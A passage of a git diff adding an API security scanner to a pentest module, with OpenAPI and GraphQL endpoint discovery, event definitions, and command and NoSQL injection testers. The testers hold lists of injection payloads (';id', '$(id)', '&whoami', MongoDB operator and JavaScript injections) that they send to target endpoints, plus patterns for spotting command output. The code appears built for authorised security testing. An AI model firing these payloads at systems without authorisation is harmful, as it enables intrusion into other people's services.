+
+    lines.push("Privilege Escalation Test")
+    lines.push("=========================")
+    lines.push("")
+    lines.push(`Endpoint: ${result.method} ${result.endpoint}`)
+    lines.push(`Admin Required: ${result.adminRequired ? "Yes" : "No"}`)
+    lines.push(`Accessible (User Auth): ${result.accessibleWithUserAuth ? "Yes" : "No"}`)
+    lines.push(`Accessible (No Auth): ${result.accessibleWithoutAuth ? "Yes" : "No"}`)
+    lines.push(`Vulnerable: ${result.vulnerable ? "YES" : "NO"}`)
+
+    if (result.issues.length > 0) {
+      lines.push("")
+      lines.push("Issues:")
+      for (const issue of result.issues) {
+        lines.push(`  - ${issue}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format multiple results as a summary.
+   *
+   * @param results - Array of test results
+   * @returns Formatted summary
+   */
+  export function formatSummary(results: PrivilegeTestResult[]): string {
+    const lines: string[] = []
+
+    const vulnerableCount = results.filter((r) => r.vulnerable).length
+    const totalIssues = results.reduce((sum, r) => sum + r.issues.length, 0)
+
+    lines.push("Privilege Escalation Summary")
+    lines.push("============================")
+    lines.push("")
+    lines.push(`Endpoints Tested: ${results.length}`)
+    lines.push(`Vulnerable: ${vulnerableCount}`)
+    lines.push(`Total Issues: ${totalIssues}`)
+
+    if (vulnerableCount > 0) {
+      lines.push("")
+      lines.push("Vulnerable Endpoints:")
+      for (const result of results.filter((r) => r.vulnerable)) {
+        lines.push(`  - ${result.method} ${result.endpoint}`)
+        for (const issue of result.issues) {
+          lines.push(`      ${issue}`)
+        }
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/discovery.ts b/packages/opencode/src/pentest/apiscan/discovery.ts
new file mode 100644
index 00000000000..743dd4f4217
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/discovery.ts
@@ -0,0 +1,404 @@
+/**
+ * @fileoverview API Discovery
+ *
+ * Discovers API endpoints by probing common paths for
+ * OpenAPI/Swagger specs and GraphQL introspection.
+ *
+ * @module pentest/apiscan/discovery
+ */
+
+import { ApiScanTypes } from "./types"
+import { OpenApiParser } from "./parsers/openapi"
+import { GraphQLParser } from "./parsers/graphql"
+import { ApiScanEvents } from "./events"
+import { ApiScanStorage } from "./storage"
+import type { StorageConfig } from "./storage"
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "apiscan.discovery" })
+
+/**
+ * Discovery options.
+ */
+export interface DiscoveryOptions {
+  /** Parse OpenAPI/Swagger specs (default: true) */
+  parseOpenApi?: boolean
+  /** Parse GraphQL introspection (default: true) */
+  parseGraphQL?: boolean
+  /** Probe common API paths (default: true) */
+  commonPaths?: boolean
+  /** Custom spec URL to try */
+  specUrl?: string
+  /** Request timeout in ms (default: 10000) */
+  timeout?: number
+  /** Custom headers */
+  headers?: Record<string, string>
+  /** Storage configuration */
+  storage?: StorageConfig
+}
+
+/**
+ * Discovery result.
+ */
+export interface DiscoveryResult {
+  success: boolean
+  spec?: ApiScanTypes.ApiSpec
+  specType?: ApiScanTypes.SpecType
+  error?: string
+  probedPaths?: string[]
+}
+
+/**
+ * API discovery namespace.
+ */
+export namespace ApiDiscovery {
+  /**
+   * Discover API specification from a target URL.
+   *
+   * @param target - Target URL
+   * @param options - Discovery options
+   * @returns Discovery result
+   */
+  export async function discover(target: string, options: DiscoveryOptions = {}): Promise<DiscoveryResult> {
+    const {
+      parseOpenApi = true,
+      parseGraphQL = true,
+      commonPaths = true,
+      specUrl,
+      timeout = 10000,
+      headers = {},
+      storage,
+    } = options
+
+    log.info("Starting API discovery", { target, parseOpenApi, parseGraphQL })
+
+    await Bus.publish(ApiScanEvents.DiscoveryStarted, {
+      target,
+      parseOpenApi,
+      parseGraphQL,
+    })
+
+    const probedPaths: string[] = []
+    const baseUrl = normalizeUrl(target)
+
+    // Try custom spec URL first if provided
+    if (specUrl) {
+      const result = await trySpecUrl(specUrl, baseUrl, timeout, headers, storage)
+      if (result.success) {
+        return { ...result, probedPaths: [specUrl] }
+      }
+      probedPaths.push(specUrl)
+    }
+
+    // Try OpenAPI paths
+    if (parseOpenApi && commonPaths) {
+      for (const path of ApiScanTypes.COMMON_API_PATHS) {
+        const url = new URL(path, baseUrl).toString()
+        probedPaths.push(url)
+
+        const result = await tryOpenApiPath(url, baseUrl, timeout, headers, storage)
+        if (result.success) {
+          return { ...result, probedPaths }
+        }
+      }
+    }
+
+    // Try GraphQL introspection
+    if (parseGraphQL && commonPaths) {
+      for (const path of ApiScanTypes.COMMON_GRAPHQL_PATHS) {
+        const url = new URL(path, baseUrl).toString()
+        probedPaths.push(url)
+
+        const result = await tryGraphQLIntrospection(url, timeout, headers, storage)
+        if (result.success) {
+          return { ...result, probedPaths }
+        }
+      }
+    }
+
+    log.warn("API discovery failed - no spec found", { target, probedPaths: probedPaths.length })
+    return {
+      success: false,
+      error: "No API specification found",
+      probedPaths,
+    }
+  }
+
+  /**
+   * Try a specific spec URL.
+   *
+   * @param url - Spec URL to try
+   * @param baseUrl - Base URL for the API
+   * @param timeout - Request timeout
+   * @param headers - Custom headers
+   * @param storage - Storage config
+   * @returns Discovery result
+   */
+  async function trySpecUrl(
+    url: string,
+    baseUrl: string,
+    timeout: number,
+    headers: Record<string, string>,
+    storage?: StorageConfig
+  ): Promise<DiscoveryResult> {
+    // Check if it's a GraphQL endpoint
+    if (url.includes("graphql")) {
+      return tryGraphQLIntrospection(url, timeout, headers, storage)
+    }
+    return tryOpenApiPath(url, baseUrl, timeout, headers, storage)
+  }
+
+  /**
+   * Try to fetch and parse an OpenAPI spec from a path.
+   *
+   * @param url - URL to fetch
+   * @param baseUrl - Base URL for the API
+   * @param timeout - Request timeout
+   * @param headers - Custom headers
+   * @param storage - Storage config
+   * @returns Discovery result
+   */
+  async function tryOpenApiPath(
+    url: string,
+    baseUrl: string,
+    timeout: number,
+    headers: Record<string, string>,
+    storage?: StorageConfig
+  ): Promise<DiscoveryResult> {
+    try {
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url, {
+        method: "GET",
+        headers: {
+          Accept: "application/json, application/yaml, text/yaml",
+          ...headers,
+        },
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      if (!response.ok) {
+        return { success: false }
+      }
+
+      const text = await response.text()
+
+      // Try to parse as JSON
+      let data: object
+      try {
+        data = JSON.parse(text)
+      } catch {
+        // Could be YAML - for now we only support JSON
+        log.debug("Response is not JSON", { url })
+        return { success: false }
+      }
+
+      if (!OpenApiParser.isValidSpec(data)) {
+        return { success: false }
+      }
+
+      const spec = OpenApiParser.parse(data, baseUrl)
+
+      // Save to storage
+      const savedSpec = await ApiScanStorage.saveSpec(spec, storage)
+
+      // Publish events
+      await Bus.publish(ApiScanEvents.SpecParsed, {
+        specId: savedSpec.id,
+        target: baseUrl,
+        type: "openapi",
+        endpointCount: spec.endpoints.length,
+        securitySchemeCount: spec.securitySchemes.length,
+      })
+
+      for (const endpoint of spec.endpoints) {
+        await Bus.publish(ApiScanEvents.EndpointDiscovered, {
+          specId: savedSpec.id,
+          path: endpoint.path,
+          method: endpoint.method,
+          summary: endpoint.summary,
+        })
+      }
+
+      log.info("OpenAPI spec discovered", { url, endpoints: spec.endpoints.length })
+      return {
+        success: true,
+        spec: savedSpec,
+        specType: "openapi",
+      }
+    } catch (err) {
+      if ((err as Error).name === "AbortError") {
+        log.debug("Request timed out", { url })
+      } else {
+        log.debug("Failed to fetch OpenAPI spec", { url, error: (err as Error).message })
+      }
+      return { success: false }
+    }
+  }
+
+  /**
+   * Try GraphQL introspection at a URL.
+   *
+   * @param url - GraphQL endpoint URL
+   * @param timeout - Request timeout
+   * @param headers - Custom headers
+   * @param storage - Storage config
+   * @returns Discovery result
+   */
+  async function tryGraphQLIntrospection(
+    url: string,
+    timeout: number,
+    headers: Record<string, string>,
+    storage?: StorageConfig
+  ): Promise<DiscoveryResult> {
+    try {
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url, {
+        method: "POST",
+        headers: {
+          "Content-Type": "application/json",
+          Accept: "application/json",
+          ...headers,
+        },
+        body: JSON.stringify({
+          query: GraphQLParser.INTROSPECTION_QUERY,
+        }),
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      if (!response.ok) {
+        return { success: false }
+      }
+
+      const data = await response.json()
+
+      if (!GraphQLParser.isValidIntrospection(data)) {
+        return { success: false }
+      }
+
+      const spec = GraphQLParser.parse(data, url)
+
+      // Save to storage
+      const savedSpec = await ApiScanStorage.saveSpec(spec, storage)
+
+      // Publish events
+      await Bus.publish(ApiScanEvents.SpecParsed, {
+        specId: savedSpec.id,
+        target: url,
+        type: "graphql",
+        endpointCount: spec.endpoints.length,
+        securitySchemeCount: 0,
+      })
+
+      for (const endpoint of spec.endpoints) {
+        await Bus.publish(ApiScanEvents.EndpointDiscovered, {
+          specId: savedSpec.id,
+          path: endpoint.path,
+          method: endpoint.method,
+          summary: endpoint.summary,
+        })
+      }
+
+      log.info("GraphQL introspection successful", { url, endpoints: spec.endpoints.length })
+      return {
+        success: true,
+        spec: savedSpec,
+        specType: "graphql",
+      }
+    } catch (err) {
+      if ((err as Error).name === "AbortError") {
+        log.debug("Request timed out", { url })
+      } else {
+        log.debug("Failed GraphQL introspection", { url, error: (err as Error).message })
+      }
+      return { success: false }
+    }
+  }
+
+  /**
+   * Normalize a URL to ensure it has a scheme and trailing slash.
+   *
+   * @param url - URL to normalize
+   * @returns Normalized URL
+   */
+  function normalizeUrl(url: string): string {
+    // Add scheme if missing
+    if (!url.startsWith("http://") && !url.startsWith("https://")) {
+      url = `https://${url}`
+    }
+
+    // Ensure trailing slash for base URL
+    const parsed = new URL(url)
+    if (!parsed.pathname.endsWith("/")) {
+      parsed.pathname += "/"
+    }
+
+    return parsed.origin + parsed.pathname
+  }
+
+  /**
+   * Parse a spec from raw content.
+   *
+   * @param content - Raw spec content (JSON string or object)
+   * @param type - Spec type
+   * @param baseUrl - Base URL
+   * @param storage - Storage config
+   * @returns Parsed and saved spec
+   */
+  export async function parseSpec(
+    content: string | object,
+    type: "openapi" | "graphql",
+    baseUrl: string,
+    storage?: StorageConfig
+  ): Promise<ApiScanTypes.ApiSpec> {
+    let spec: ApiScanTypes.ApiSpec
+
+    if (type === "openapi") {
+      spec = OpenApiParser.parse(content, baseUrl)
+    } else {
+      spec = GraphQLParser.parse(content, baseUrl)
+    }
+
+    return ApiScanStorage.saveSpec(spec, storage)
+  }
+
+  /**
+   * Fetch and parse a spec from a URL.
+   *
+   * @param url - Spec URL
+   * @param type - Spec type
+   * @param baseUrl - Base URL for the API
+   * @param options - Fetch options
+   * @returns Parsed spec
+   */
+  export async function fetchSpec(
+    url: string,
+    type: "openapi" | "graphql",
+    baseUrl: string,
+    options: { timeout?: number; headers?: Record<string, string>; storage?: StorageConfig } = {}
+  ): Promise<ApiScanTypes.ApiSpec> {
+    const { timeout = 10000, headers = {}, storage } = options
+
+    if (type === "graphql") {
+      const result = await tryGraphQLIntrospection(url, timeout, headers, storage)
+      if (!result.success || !result.spec) {
+        throw new Error("Failed to fetch GraphQL introspection")
+      }
+      return result.spec
+    }
+
+    const result = await tryOpenApiPath(url, baseUrl, timeout, headers, storage)
+    if (!result.success || !result.spec) {
+      throw new Error("Failed to fetch OpenAPI spec")
+    }
+    return result.spec
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/events.ts b/packages/opencode/src/pentest/apiscan/events.ts
new file mode 100644
index 00000000000..77d327128b3
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/events.ts
@@ -0,0 +1,149 @@
+/**
+ * @fileoverview API Scanner Events
+ *
+ * Bus event definitions for API scanning operations.
+ *
+ * @module pentest/apiscan/events
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+
+/**
+ * API scanner events namespace.
+ */
+export namespace ApiScanEvents {
+  /**
+   * API discovery started.
+   */
+  export const DiscoveryStarted = BusEvent.define(
+    "pentest.apiscan.discovery_started",
+    z.object({
+      target: z.string(),
+      parseOpenApi: z.boolean(),
+      parseGraphQL: z.boolean(),
+    })
+  )
+
+  /**
+   * Endpoint discovered during API discovery.
+   */
+  export const EndpointDiscovered = BusEvent.define(
+    "pentest.apiscan.endpoint_discovered",
+    z.object({
+      specId: z.string(),
+      path: z.string(),
+      method: z.string(),
+      summary: z.string().optional(),
+    })
+  )
+
+  /**
+   * API specification parsed.
+   */
+  export const SpecParsed = BusEvent.define(
+    "pentest.apiscan.spec_parsed",
+    z.object({
+      specId: z.string(),
+      target: z.string(),
+      type: z.enum(["openapi", "graphql", "manual"]),
+      endpointCount: z.number(),
+      securitySchemeCount: z.number(),
+    })
+  )
+
+  /**
+   * Scan started.
+   */
+  export const ScanStarted = BusEvent.define(
+    "pentest.apiscan.scan_started",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      profile: z.string(),
+      endpointCount: z.number(),
+    })
+  )
+
+  /**
+   * Endpoint test completed.
+   */
+  export const EndpointTested = BusEvent.define(
+    "pentest.apiscan.endpoint_tested",
+    z.object({
+      scanID: z.string(),
+      endpointId: z.string(),
+      path: z.string(),
+      method: z.string(),
+      findingsCount: z.number(),
+    })
+  )
+
+  /**
+   * Authentication test completed.
+   */
+  export const AuthTested = BusEvent.define(
+    "pentest.apiscan.auth_tested",
+    z.object({
+      scanID: z.string(),
+      authType: z.string(),
+      issuesFound: z.number(),
+      attackVectors: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Injection test completed.
+   */
+  export const InjectionTested = BusEvent.define(
+    "pentest.apiscan.injection_tested",
+    z.object({
+      scanID: z.string(),
+      endpoint: z.string(),
+      type: z.enum(["sql", "nosql", "command"]),
+      vulnerable: z.boolean(),
+    })
+  )
+
+  /**
+   * Vulnerability found during scan.
+   */
+  export const VulnerabilityFound = BusEvent.define(
+    "pentest.apiscan.vulnerability_found",
+    z.object({
+      scanID: z.string(),
+      findingID: z.string(),
+      type: z.string(),
+      severity: z.enum(["critical", "high", "medium", "low", "info"]),
+      endpoint: z.string().optional(),
+    })
+  )
+
+  /**
+   * Scan completed.
+   */
+  export const ScanCompleted = BusEvent.define(
+    "pentest.apiscan.scan_completed",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      profile: z.string(),
+      endpointsScanned: z.number(),
+      findingsCount: z.number(),
+      duration: z.number(),
+      status: z.enum(["completed", "failed", "stopped"]),
+    })
+  )
+
+  /**
+   * Scan failed.
+   */
+  export const ScanFailed = BusEvent.define(
+    "pentest.apiscan.scan_failed",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      error: z.string(),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/apiscan/index.ts b/packages/opencode/src/pentest/apiscan/index.ts
new file mode 100644
index 00000000000..07ccf96634b
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/index.ts
@@ -0,0 +1,46 @@
+/**
+ * @fileoverview API Security Scanner
+ *
+ * Provides API discovery, authentication testing, authorization testing,
+ * and injection testing for the cyxwiz pentest module.
+ *
+ * Features:
+ * - OpenAPI/Swagger spec parsing
+ * - GraphQL introspection parsing
+ * - JWT token analysis
+ * - BOLA/IDOR detection
+ * - SQL/NoSQL/Command injection testing
+ * - OWASP API Top 10 2023 categorization
+ *
+ * @module pentest/apiscan
+ */
+
+// Types
+export { ApiScanTypes } from "./types"
+
+// Events
+export { ApiScanEvents } from "./events"
+
+// Core functionality
+export { ApiDiscovery, type DiscoveryOptions, type DiscoveryResult } from "./discovery"
+export { ApiScanOrchestrator, type ScanOptions } from "./orchestrator"
+export { ApiScanProfiles } from "./profiles"
+export { ApiScanStorage, type StorageConfig } from "./storage"
+
+// Tool
+export { ApiScanTool } from "./tool"
+
+// Parsers
+export { OpenApiParser, GraphQLParser } from "./parsers"
+
+// Auth testing
+export { JwtAnalyzer, ApiKeyTester, OAuthTester } from "./auth"
+export type { ApiKeyTestResult, OAuthTestResult } from "./auth"
+
+// Authorization testing
+export { BolaDetector, PrivilegeTester } from "./authz"
+export type { BolaTestOptions, PrivilegeTestResult, PrivilegeTestOptions } from "./authz"
+
+// Injection testing
+export { SqlInjectionTester, NoSqlInjectionTester, CommandInjectionTester } from "./injection"
+export type { SqlInjectionOptions, NoSqlInjectionOptions, CommandInjectionOptions } from "./injection"
diff --git a/packages/opencode/src/pentest/apiscan/injection/command.ts b/packages/opencode/src/pentest/apiscan/injection/command.ts
new file mode 100644
index 00000000000..caf258c2cda
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/injection/command.ts
@@ -0,0 +1,411 @@
+/**
+ * @fileoverview Command Injection Testing
+ *
+ * Tests API endpoints for OS command injection vulnerabilities
+ * using safe detection payloads.
+ *
+ * @module pentest/apiscan/injection/command
+ */
+
+import { ApiScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "apiscan.cmdi" })
+
+/**
+ * Command injection payloads for testing.
+ * These are designed to be detectable without causing harm.
+ */
+const COMMAND_PAYLOADS = [
+  // Concatenation/chaining (Unix)
+  ";id",
+  "|id",
+  "||id",
+  "&&id",
+  "`id`",
+  "$(id)",
+  ";ls",
+  "|ls",
+  // Concatenation/chaining (Windows)
+  "&whoami",
+  "&&whoami",
+  "|whoami",
+  "||whoami",
+  // Time-based detection
+  ";sleep 5",
+  "&&sleep 5",
+  "|sleep 5",
+  "`sleep 5`",
+  "$(sleep 5)",
+  "&ping -c 5 127.0.0.1",
+  ";ping -n 5 127.0.0.1",
+  // Quote breaking
+  '";id',
+  "';id",
+  '`";id`',
+  // Newline injection
+  "\nid",
+  "\r\nid",
+  "%0aid",
+  "%0d%0aid",
+]
+
+/**
+ * Command execution output patterns.
+ */
+const COMMAND_OUTPUT_PATTERNS = [
+  // Unix id command
+  /uid=\d+/i,
+  /gid=\d+/i,
+  /groups=/i,
+  // Unix ls command
+  /total\s+\d+/i,
+  /drwx/i,
+  /-rw-/i,
+  // Windows whoami
+  /[a-z]+\\[a-z]+/i, // domain\user format
+  /nt\s*authority/i,
+  // Windows dir
+  /Volume\s+in\s+drive/i,
+  /Directory\s+of/i,
+  // Error messages indicating execution
+  /command\s*not\s*found/i,
+  /not\s*recognized\s*as\s*an\s*internal/i,
+  /sh:\s*\d+:/i,
+  /bash:/i,
+  /zsh:/i,
+]
+
+/**
+ * Command injection test options.
+ */
+export interface CommandInjectionOptions {
+  /** Authentication config */
+  auth?: ApiScanTypes.AuthConfig
+  /** Timeout per request in ms */
+  timeout?: number
+  /** Custom headers */
+  headers?: Record<string, string>
+  /** Enable time-based detection */
+  timeBased?: boolean
+}
+
+/**
+ * Command injection tester namespace.
+ */
+export namespace CommandInjectionTester {
+  /**
+   * Test an endpoint parameter for command injection.
+   *
+   * @param endpoint - Endpoint to test
+   * @param parameter - Parameter to test
+   * @param baseUrl - Base URL
+   * @param options - Test options
+   * @returns Injection test result
+   */
+  export async function testParameter(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    parameter: ApiScanTypes.ApiParameter,
+    baseUrl: string,
+    options: CommandInjectionOptions = {}
+  ): Promise<ApiScanTypes.InjectionTestResult> {
+    const { auth, timeout = 10000, headers = {}, timeBased = false } = options
+
+    log.info("Testing parameter for command injection", {
+      endpoint: endpoint.path,
+      parameter: parameter.name,
+    })
+
+    // Build auth headers
+    const authHeaders = buildAuthHeaders(auth)
+
+    // Get baseline response
+    const baselineStart = Date.now()
+    const baselineResponse = await sendRequest(
+      endpoint,
+      parameter,
+      "normalvalue",
+      baseUrl,
+      { ...headers, ...authHeaders },
+      timeout
+    )
+    const baselineTime = Date.now() - baselineStart
+
+    // Test payloads
+    for (const payload of COMMAND_PAYLOADS) {
+      // Skip time-based payloads unless enabled
+      if (!timeBased && (payload.includes("sleep") || payload.includes("ping"))) {
+        continue
+      }
+
+      const result = await testPayload(
+        endpoint,
+        parameter,
+        payload,
+        baseUrl,
+        { ...headers, ...authHeaders },
+        timeout,
+        baselineResponse,
+        baselineTime,
+        timeBased
+      )
+
+      if (result.vulnerable) {
+        return result
+      }
+    }
+
+    // No vulnerability found
+    return {
+      endpoint: endpoint.path,
+      method: endpoint.method,
+      parameter: parameter.name,
+      type: "command",
+      vulnerable: false,
+    }
+  }
+
+  /**
+   * Test a specific payload.
+   */
+  async function testPayload(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    parameter: ApiScanTypes.ApiParameter,
+    payload: string,
+    baseUrl: string,
+    headers: Record<string, string>,
+    timeout: number,
+    baselineResponse: TestResponse | null,
+    baselineTime: number,
+    timeBased: boolean
+  ): Promise<ApiScanTypes.InjectionTestResult> {
+    const startTime = Date.now()
+    const response = await sendRequest(endpoint, parameter, payload, baseUrl, headers, timeout)
+    const responseTime = Date.now() - startTime
+
+    // Check for command output patterns in response
+    if (response?.body) {
+      for (const pattern of COMMAND_OUTPUT_PATTERNS) {
+        // Only match if not in baseline (to avoid false positives)
+        if (pattern.test(response.body) && (!baselineResponse || !pattern.test(baselineResponse.body))) {
+          log.warn("Command injection vulnerability detected (output-based)", {
+            endpoint: endpoint.path,
+            parameter: parameter.name,
+            payload,
+          })
+
+          return {
+            endpoint: endpoint.path,
+            method: endpoint.method,
+            parameter: parameter.name,
+            type: "command",
+            vulnerable: true,
+            payload,
+            evidence: `Command output pattern matched: ${pattern}`,
+            responseTime,
+          }
+        }
+      }
+    }
+
+    // Time-based detection
+    if (timeBased && (payload.includes("sleep 5") || payload.includes("ping"))) {
+      // Response should take ~5 seconds longer than baseline
+      if (responseTime > baselineTime + 4500) {
+        log.warn("Command injection vulnerability detected (time-based)", {
+          endpoint: endpoint.path,
+          parameter: parameter.name,
+          payload,
+          responseTime,
+        })
+
+        return {
+          endpoint: endpoint.path,
+          method: endpoint.method,
+          parameter: parameter.name,
+          type: "command",
+          vulnerable: true,
+          payload,
+          evidence: `Response delayed ${responseTime}ms (baseline: ${baselineTime}ms)`,
+          responseTime,
+        }
+      }
+    }
+
+    return {
+      endpoint: endpoint.path,
+      method: endpoint.method,
+      parameter: parameter.name,
+      type: "command",
+      vulnerable: false,
+      responseTime,
+    }
+  }
+
+  /**
+   * Test response structure.
+   */
+  interface TestResponse {
+    status: number
+    body: string
+  }
+
+  /**
+   * Send a request with injected payload.
+   */
+  async function sendRequest(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    parameter: ApiScanTypes.ApiParameter,
+    value: string,
+    baseUrl: string,
+    headers: Record<string, string>,
+    timeout: number
+  ): Promise<TestResponse | null> {
+    try {
+      let url = new URL(endpoint.path, baseUrl)
+      let body: string | undefined
+
+      // Inject based on parameter location
+      switch (parameter.in) {
+        case "query":
+          url.searchParams.set(parameter.name, value)
+          break
+        case "path":
+          url = new URL(endpoint.path.replace(`{${parameter.name}}`, encodeURIComponent(value)), baseUrl)
+          break
+        case "body":
+          body = JSON.stringify({ [parameter.name]: value })
+          headers["Content-Type"] = "application/json"
+          break
+        case "header":
+          headers[parameter.name] = value
+          break
+      }
+
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url.toString(), {
+        method: endpoint.method,
+        headers: {
+          Accept: "application/json",
+          ...headers,
+        },
+        body,
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      const responseBody = await response.text()
+      return { status: response.status, body: responseBody }
+    } catch {
+      return null
+    }
+  }
+
+  /**
+   * Build auth headers from config.
+   */
+  function buildAuthHeaders(auth?: ApiScanTypes.AuthConfig): Record<string, string> {
+    if (!auth) return {}
+
+    switch (auth.type) {
+      case "bearer":
+      case "jwt":
+        return auth.token ? { Authorization: `Bearer ${auth.token}` } : {}
+      case "basic":
+        if (auth.basic) {
+          const credentials = Buffer.from(`${auth.basic.username}:${auth.basic.password}`).toString("base64")
+          return { Authorization: `Basic ${credentials}` }
+        }
+        return {}
+      case "apikey":
+        if (auth.apiKey) {
+          return { [auth.apiKey.header]: auth.apiKey.value }
+        }
+        return {}
+      default:
+        return {}
+    }
+  }
+
+  /**
+   * Find parameters likely vulnerable to command injection.
+   *
+   * @param endpoint - Endpoint to analyze
+   * @returns Parameters to test
+   */
+  export function findTestableParameters(endpoint: ApiScanTypes.ApiEndpoint): ApiScanTypes.ApiParameter[] {
+    const testable: ApiScanTypes.ApiParameter[] = []
+
+    // Command injection target patterns
+    const targetPatterns = [
+      /file/i,
+      /path/i,
+      /dir/i,
+      /directory/i,
+      /command/i,
+      /cmd/i,
+      /exec/i,
+      /run/i,
+      /shell/i,
+      /script/i,
+      /ip/i,
+      /host/i,
+      /domain/i,
+      /url/i,
+      /target/i,
+      /input/i,
+      /output/i,
+      /name/i,
+    ]
+
+    for (const param of endpoint.parameters) {
+      // Check if parameter name matches patterns
+      for (const pattern of targetPatterns) {
+        if (pattern.test(param.name)) {
+          testable.push(param)
+          break
+        }
+      }
+
+      // Include string parameters in query or body
+      if (
+        param.type === "string" &&
+        (param.in === "query" || param.in === "body") &&
+        !testable.includes(param)
+      ) {
+        testable.push(param)
+      }
+    }
+
+    return testable
+  }
+
+  /**
+   * Format test result for display.
+   */
+  export function format(result: ApiScanTypes.InjectionTestResult): string {
+    const lines: string[] = []
+
+    lines.push("Command Injection Test")
+    lines.push("======================")
+    lines.push("")
+    lines.push(`Endpoint: ${result.method} ${result.endpoint}`)
+    lines.push(`Parameter: ${result.parameter}`)
+    lines.push(`Vulnerable: ${result.vulnerable ? "YES" : "NO"}`)
+
+    if (result.vulnerable) {
+      lines.push("")
+      lines.push(`Payload: ${result.payload}`)
+      lines.push(`Evidence: ${result.evidence}`)
+    }
+
+    if (result.responseTime) {
+      lines.push(`Response Time: ${result.responseTime}ms`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/injection/index.ts b/packages/opencode/src/pentest/apiscan/injection/index.ts
new file mode 100644
index 00000000000..a9e91cb8968
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/injection/index.ts
@@ -0,0 +1,11 @@
+/**
+ * @fileoverview Injection Testing Modules
+ *
+ * Exports SQL, NoSQL, and command injection testing utilities.
+ *
+ * @module pentest/apiscan/injection
+ */
+
+export { SqlInjectionTester, type SqlInjectionOptions } from "./sql"
+export { NoSqlInjectionTester, type NoSqlInjectionOptions } from "./nosql"
+export { CommandInjectionTester, type CommandInjectionOptions } from "./command"
diff --git a/packages/opencode/src/pentest/apiscan/injection/nosql.ts b/packages/opencode/src/pentest/apiscan/injection/nosql.ts
new file mode 100644
index 00000000000..c7e90f632c3
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/injection/nosql.ts
@@ -0,0 +1,424 @@
+/**
+ * @fileoverview NoSQL Injection Testing
+ *
+ * Tests API endpoints for NoSQL injection vulnerabilities
+ * targeting MongoDB, CouchDB, and similar databases.
+ *
+ * @module pentest/apiscan/injection/nosql
+ */
+
+import { ApiScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "apiscan.nosqli" })
+
+/**
+ * NoSQL injection payloads for testing.
+ */
+const NOSQL_PAYLOADS = [
+  // MongoDB operator injection
+  '{"$gt":""}',
+  '{"$ne":""}',
+  '{"$ne":null}',
+  '{"$exists":true}',
+  '{"$regex":".*"}',
+  '{"$where":"1==1"}',
+  // Query manipulation (as object)
+  { $gt: "" },
+  { $ne: "" },
+  { $ne: null },
+  { $exists: true },
+  { $regex: ".*" },
+  // Array injection
+  '["$gt",""]',
+  // JavaScript injection
+  "';return true;//",
+  '";return true;//',
+  "function(){return true}",
+  // Operator as string (for URL params)
+  "$gt",
+  "$ne",
+  "$exists",
+  "$where",
+  "$regex",
+]
+
+/**
+ * NoSQL error patterns that indicate vulnerability.
+ */
+const NOSQL_ERROR_PATTERNS = [
+  /mongodb/i,
+  /mongod/i,
+  /mongoose/i,
+  /bson/i,
+  /couchdb/i,
+  /nosql/i,
+  /documentdb/i,
+  /dynamodb/i,
+  /cassandra/i,
+  /redis/i,
+  /operator/i,
+  /\$where/i,
+  /\$gt/i,
+  /\$regex/i,
+  /invalid\s*operator/i,
+  /query\s*selector/i,
+  /projection/i,
+]
+
+/**
+ * NoSQL injection test options.
+ */
+export interface NoSqlInjectionOptions {
+  /** Authentication config */
+  auth?: ApiScanTypes.AuthConfig
+  /** Timeout per request in ms */
+  timeout?: number
+  /** Custom headers */
+  headers?: Record<string, string>
+}
+
+/**
+ * NoSQL injection tester namespace.
+ */
+export namespace NoSqlInjectionTester {
+  /**
+   * Test an endpoint parameter for NoSQL injection.
+   *
+   * @param endpoint - Endpoint to test
+   * @param parameter - Parameter to test
+   * @param baseUrl - Base URL
+   * @param options - Test options
+   * @returns Injection test result
+   */
+  export async function testParameter(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    parameter: ApiScanTypes.ApiParameter,
+    baseUrl: string,
+    options: NoSqlInjectionOptions = {}
+  ): Promise<ApiScanTypes.InjectionTestResult> {
+    const { auth, timeout = 10000, headers = {} } = options
+
+    log.info("Testing parameter for NoSQL injection", {
+      endpoint: endpoint.path,
+      parameter: parameter.name,
+    })
+
+    // Build auth headers
+    const authHeaders = buildAuthHeaders(auth)
+
+    // Get baseline response
+    const baselineResponse = await sendRequest(
+      endpoint,
+      parameter,
+      "normalvalue",
+      baseUrl,
+      { ...headers, ...authHeaders },
+      timeout
+    )
+
+    // Test payloads
+    for (const payload of NOSQL_PAYLOADS) {
+      const payloadStr = typeof payload === "object" ? JSON.stringify(payload) : payload
+
+      const result = await testPayload(
+        endpoint,
+        parameter,
+        payload,
+        baseUrl,
+        { ...headers, ...authHeaders },
+        timeout,
+        baselineResponse
+      )
+
+      if (result.vulnerable) {
+        return result
+      }
+    }
+
